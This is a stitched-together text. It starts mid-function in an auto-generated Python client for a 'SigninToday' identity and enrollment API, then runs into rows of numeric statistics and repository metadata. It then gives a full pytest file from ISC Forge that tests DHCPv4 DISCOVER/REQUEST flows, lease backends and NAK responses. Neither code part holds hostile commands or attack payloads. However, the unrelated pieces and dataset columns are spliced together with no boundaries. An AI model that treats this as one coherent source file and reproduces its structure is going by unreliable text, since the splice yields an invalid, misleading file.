if ('organization_id' not in local_var_params or
local_var_params['organization_id'] is None):
raise ApiValueError("Missing the required parameter `organization_id` when calling `list_identities`") # noqa: E501
if 'count' in local_var_params and local_var_params['count'] > 100: # noqa: E501
raise ApiValueError("Invalid value for parameter `count` when calling `list_identities`, must be a value less than or equal to `100`") # noqa: E501
if 'count' in local_var_params and local_var_params['count'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `count` when calling `list_identities`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organization_id' in local_var_params:
path_params['organization-id'] = local_var_params['organization_id'] # noqa: E501
query_params = []
if 'where_provider' in local_var_params:
query_params.append(('where_provider', local_var_params['where_provider'])) # noqa: E501
if 'where_user' in local_var_params:
query_params.append(('where_user', local_var_params['where_user'])) # noqa: E501
if 'where_first_name' in local_var_params:
query_params.append(('where_first_name', local_var_params['where_first_name'])) # noqa: E501
if 'where_last_name' in local_var_params:
query_params.append(('where_last_name', local_var_params['where_last_name'])) # noqa: E501
if 'where_registered_by' in local_var_params:
query_params.append(('where_registered_by', local_var_params['where_registered_by'])) # noqa: E501
if 'where_fiscal_code' in local_var_params:
query_params.append(('where_fiscal_code', local_var_params['where_fiscal_code'])) # noqa: E501
if 'page' in local_var_params:
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'count' in local_var_params:
query_params.append(('count', local_var_params['count'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKeyAuth'] # noqa: E501
return self.api_client.call_api(
'/{organization-id}/identities', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2001', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_user_enrollments(self, organization_id, user_id, **kwargs): # noqa: E501
"""List the enrollments of an user # noqa: E501
This API allows to list all the enrollments of an user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_user_enrollments(organization_id, user_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also know as **slug** and it is used as a path parameter to restrict the asked functionality to the specified organization (required)
:param Id user_id: The **user-id** is the uuid code that identifies a user of an organization. It is used as a path parameter to restrict the requested operation to the scope of that user (required)
:param int page: Restricts the search to the chosen page
:param int count: Sets the number of users per page to display
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2005
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_user_enrollments_with_http_info(organization_id, user_id, **kwargs) # noqa: E501
def list_user_enrollments_with_http_info(self, organization_id, user_id, **kwargs): # noqa: E501
"""List the enrollments of an user # noqa: E501
This API allows to list all the enrollments of an user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_user_enrollments_with_http_info(organization_id, user_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also know as **slug** and it is used as a path parameter to restrict the asked functionality to the specified organization (required)
:param Id user_id: The **user-id** is the uuid code that identifies a user of an organization. It is used as a path parameter to restrict the requested operation to the scope of that user (required)
:param int page: Restricts the search to the chosen page
:param int count: Sets the number of users per page to display
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2005, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['organization_id', 'user_id', 'page', 'count'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_user_enrollments" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in local_var_params or
local_var_params['organization_id'] is None):
raise ApiValueError("Missing the required parameter `organization_id` when calling `list_user_enrollments`") # noqa: E501
# verify the required parameter 'user_id' is set
if ('user_id' not in local_var_params or
local_var_params['user_id'] is None):
raise ApiValueError("Missing the required parameter `user_id` when calling `list_user_enrollments`") # noqa: E501
if 'count' in local_var_params and local_var_params['count'] > 100: # noqa: E501
raise ApiValueError("Invalid value for parameter `count` when calling `list_user_enrollments`, must be a value less than or equal to `100`") # noqa: E501
if 'count' in local_var_params and local_var_params['count'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `count` when calling `list_user_enrollments`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organization_id' in local_var_params:
path_params['organization-id'] = local_var_params['organization_id'] # noqa: E501
if 'user_id' in local_var_params:
path_params['user-id'] = local_var_params['user_id'] # noqa: E501
query_params = []
if 'page' in local_var_params:
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'count' in local_var_params:
query_params.append(('count', local_var_params['count'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKeyAuth'] # noqa: E501
return self.api_client.call_api(
'/{organization-id}/users/{user-id}/identity-requests', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2005', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_user_identities(self, organization_id, user_id, **kwargs): # noqa: E501
"""Enumerate the identities of an user # noqa: E501
This API allows to enumerate all the identities of an user, which are located in its wallet. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_user_identities(organization_id, user_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also know as **slug** and it is used as a path parameter to restrict the asked functionality to the specified organization (required)
:param Id user_id: The **user-id** is the uuid code that identifies a user of an organization. It is used as a path parameter to restrict the requested operation to the scope of that user (required)
:param int page: Restricts the search to the chosen page
:param int count: Sets the number of users per page to display
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_user_identities_with_http_info(organization_id, user_id, **kwargs) # noqa: E501
def list_user_identities_with_http_info(self, organization_id, user_id, **kwargs): # noqa: E501
"""Enumerate the identities of an user # noqa: E501
This API allows to enumerate all the identities of an user, which are located in its wallet. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_user_identities_with_http_info(organization_id, user_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also know as **slug** and it is used as a path parameter to restrict the asked functionality to the specified organization (required)
:param Id user_id: The **user-id** is the uuid code that identifies a user of an organization. It is used as a path parameter to restrict the requested operation to the scope of that user (required)
:param int page: Restricts the search to the chosen page
:param int count: Sets the number of users per page to display
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2001, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['organization_id', 'user_id', 'page', 'count'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_user_identities" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in local_var_params or
local_var_params['organization_id'] is None):
raise ApiValueError("Missing the required parameter `organization_id` when calling `list_user_identities`") # noqa: E501
# verify the required parameter 'user_id' is set
if ('user_id' not in local_var_params or
local_var_params['user_id'] is None):
raise ApiValueError("Missing the required parameter `user_id` when calling `list_user_identities`") # noqa: E501
if 'count' in local_var_params and local_var_params['count'] > 100: # noqa: E501
raise ApiValueError("Invalid value for parameter `count` when calling `list_user_identities`, must be a value less than or equal to `100`") # noqa: E501
if 'count' in local_var_params and local_var_params['count'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `count` when calling `list_user_identities`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organization_id' in local_var_params:
path_params['organization-id'] = local_var_params['organization_id'] # noqa: E501
if 'user_id' in local_var_params:
path_params['user-id'] = local_var_params['user_id'] # noqa: E501
query_params = []
if 'page' in local_var_params:
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'count' in local_var_params:
query_params.append(('count', local_var_params['count'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKeyAuth'] # noqa: E501
return self.api_client.call_api(
'/{organization-id}/users/{user-id}/wallet', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2001', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def request_enrollment(self, organization_id, identity_request, **kwargs): # noqa: E501
"""Submit an enrollment request # noqa: E501
This API allows to submit an enrollment request. The user of the request will be created if it does not exists already. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.request_enrollment(organization_id, identity_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also know as **slug** and it is used as a path parameter to restrict the asked functionality to the specified organization (required)
:param IdentityRequest identity_request: The enrollment request to submit (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2011
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.request_enrollment_with_http_info(organization_id, identity_request, **kwargs) # noqa: E501
def request_enrollment_with_http_info(self, organization_id, identity_request, **kwargs): # noqa: E501
"""Submit an enrollment request # noqa: E501
This API allows to submit an enrollment request. The user of the request will be created if it does not exists already. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.request_enrollment_with_http_info(organization_id, identity_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also know as **slug** and it is used as a path parameter to restrict the asked functionality to the specified organization (required)
:param IdentityRequest identity_request: The enrollment request to submit (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2011, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['organization_id', 'identity_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method request_enrollment" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in local_var_params or
local_var_params['organization_id'] is None):
raise ApiValueError("Missing the required parameter `organization_id` when calling `request_enrollment`") # noqa: E501
# verify the required parameter 'identity_request' is set
if ('identity_request' not in local_var_params or
local_var_params['identity_request'] is None):
raise ApiValueError("Missing the required parameter `identity_request` when calling `request_enrollment`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organization_id' in local_var_params:
path_params['organization-id'] = local_var_params['organization_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'identity_request' in local_var_params:
body_params = local_var_params['identity_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKeyAuth'] # noqa: E501
return self.api_client.call_api(
'/{organization-id}/enroll', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2011', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 63.199518
| 9,710
| 0.681243
| 11,433
| 104,848
| 6.023441
| 0.025977
| 0.033689
| 0.053669
| 0.018587
| 0.845061
| 0.84178
| 0.83799
| 0.835521
| 0.831862
| 0.825705
| 0
| 0.024944
| 0.254769
| 104,848
| 1,658
| 9,711
| 63.237636
| 0.856417
| 0.55034
| 0
| 0.808094
| 0
| 0.010444
| 0.247761
| 0.051883
| 0
| 1
| 0
| 0
| 0
| 1
| 0.035248
| false
| 0
| 0.006527
| 0
| 0.077024
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
9967102c9cf3b62a9bbb862fa8f93e3f99d4c08b
| 14,985
|
py
|
Python
|
tests/dhcpv4/process/test_v4_request_part1.py
|
isc-projects/forge
|
dfec8b41003d6b5a229f69ee93616e0e5cc6d71b
|
[
"0BSD"
] | 22
|
2015-02-27T11:51:05.000Z
|
2022-02-28T12:39:29.000Z
|
tests/dhcpv4/process/test_v4_request_part1.py
|
isc-projects/forge
|
dfec8b41003d6b5a229f69ee93616e0e5cc6d71b
|
[
"0BSD"
] | 16
|
2018-10-30T15:00:12.000Z
|
2019-01-11T17:55:13.000Z
|
tests/dhcpv4/process/test_v4_request_part1.py
|
isc-projects/forge
|
dfec8b41003d6b5a229f69ee93616e0e5cc6d71b
|
[
"0BSD"
] | 11
|
2015-02-27T11:51:36.000Z
|
2021-03-30T08:33:54.000Z
|
"""DHCPv4 address request process"""
# pylint: disable=invalid-name,line-too-long
import pytest
import misc
import srv_control
import srv_msg
@pytest.mark.v4
@pytest.mark.request
@pytest.mark.parametrize("backend", ['memfile', 'mysql', 'postgresql'])
def test_v4_request_selecting_success_chaddr(backend):
misc.test_setup()
srv_control.define_temporary_lease_db_backend(backend)
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.1-192.168.50.1')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_include_option(1)
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
misc.test_procedure()
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '192.168.50.1')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.check_leases(srv_msg.get_all_leases(), backend=backend)
@pytest.mark.v4
@pytest.mark.request
@pytest.mark.parametrize("backend", ['memfile', 'mysql', 'postgresql'])
def test_v4_request_selecting_success_chaddr_multiple_pools(backend):
misc.test_setup()
srv_control.define_temporary_lease_db_backend(backend)
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.1-192.168.50.1')
srv_control.new_pool('192.168.50.2-192.168.50.2', 0)
srv_control.new_pool('192.168.50.3-192.168.50.3', 0)
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option(1)
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:01')
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_include_option(1)
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:01')
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '192.168.50.1')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.check_leases(srv_msg.get_all_leases(), backend=backend)
misc.test_procedure()
srv_msg.client_requests_option(1)
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:02')
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_include_option(1)
srv_msg.response_check_content('yiaddr', '192.168.50.2')
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:02')
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '192.168.50.2')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '192.168.50.2')
srv_msg.response_check_include_option(1)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.check_leases(srv_msg.get_all_leases(), backend=backend)
misc.test_procedure()
srv_msg.client_requests_option(1)
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:03')
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_include_option(1)
srv_msg.response_check_content('yiaddr', '192.168.50.3')
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:03')
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '192.168.50.3')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '192.168.50.3')
srv_msg.response_check_include_option(1)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.check_leases(srv_msg.get_all_leases(), backend=backend)
@pytest.mark.v4
@pytest.mark.request
def test_v4_request_selecting_success_chaddr_empty_pool():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.1-192.168.50.1')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(54)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.response_check_option_content(54, 'value', '$(SRV4_ADDR)')
misc.test_procedure()
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '192.168.50.1')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(54)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.response_check_option_content(54, 'value', '$(SRV4_ADDR)')
misc.test_procedure()
srv_msg.client_requests_option(1)
srv_msg.client_sets_value('Client', 'chaddr', 'ff:01:02:03:ff:04')
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_dont_wait_for_message()
@pytest.mark.v4
@pytest.mark.request
@pytest.mark.parametrize("backend", ['memfile', 'mysql', 'postgresql'])
def test_v4_request_selecting_success_client_id(backend):
misc.test_setup()
srv_control.define_temporary_lease_db_backend(backend)
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.1-192.168.50.1')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_does_include_with_value('client_id', '00010203040506')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(54)
srv_msg.response_check_include_option(61)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.response_check_option_content(61, 'value', '00010203040506')
misc.test_procedure()
srv_msg.client_does_include_with_value('client_id', '00010203040506')
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '192.168.50.1')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(54)
srv_msg.response_check_include_option(61)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.response_check_option_content(61, 'value', '00010203040506')
srv_msg.check_leases(srv_msg.get_all_leases(), backend=backend)
@pytest.mark.v4
@pytest.mark.request
def test_v4_request_selecting_success_client_id_empty_pool():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.1-192.168.50.1')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_does_include_with_value('client_id', '00010203040506')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(54)
srv_msg.response_check_include_option(61)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.response_check_option_content(61, 'value', '00010203040506')
misc.test_procedure()
srv_msg.client_does_include_with_value('client_id', '00010203040506')
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '192.168.50.1')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(54)
srv_msg.response_check_include_option(61)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.response_check_option_content(61, 'value', '00010203040506')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_does_include_with_value('client_id', '00020304050607')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_dont_wait_for_message()
@pytest.mark.v4
@pytest.mark.request
def test_v4_request_selecting_success_client_id_chaddr_empty_pool():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.1-192.168.50.1')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_does_include_with_value('client_id', '00010203040506')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(54)
srv_msg.response_check_include_option(61)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.response_check_option_content(61, 'value', '00010203040506')
misc.test_procedure()
srv_msg.client_does_include_with_value('client_id', '00010203040506')
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '192.168.50.1')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(54)
srv_msg.response_check_include_option(61)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.response_check_option_content(61, 'value', '00010203040506')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:11')
srv_msg.client_does_include_with_value('client_id', '11020304050607')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_dont_wait_for_message()
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_does_include_with_value('client_id', '11020304050607')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_dont_wait_for_message()
@pytest.mark.v4
@pytest.mark.request
def test_v4_request_selecting_success_second_request_fail():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.1-192.168.50.1')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_include_option(1)
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '192.168.50.1')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(54)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:22:11:00')
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '192.168.50.1')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'NAK')
srv_msg.response_check_include_option(54)
srv_msg.response_check_option_content(54, 'value', '$(SRV4_ADDR)')
| 39.330709
| 81
| 0.749216
| 2,342
| 14,985
| 4.382152
| 0.044833
| 0.121017
| 0.109909
| 0.146254
| 0.98061
| 0.98061
| 0.980415
| 0.976518
| 0.975738
| 0.975738
| 0
| 0.092845
| 0.113046
| 14,985
| 380
| 82
| 39.434211
| 0.679332
| 0.004938
| 0
| 0.935065
| 0
| 0
| 0.183831
| 0.015096
| 0
| 0
| 0
| 0
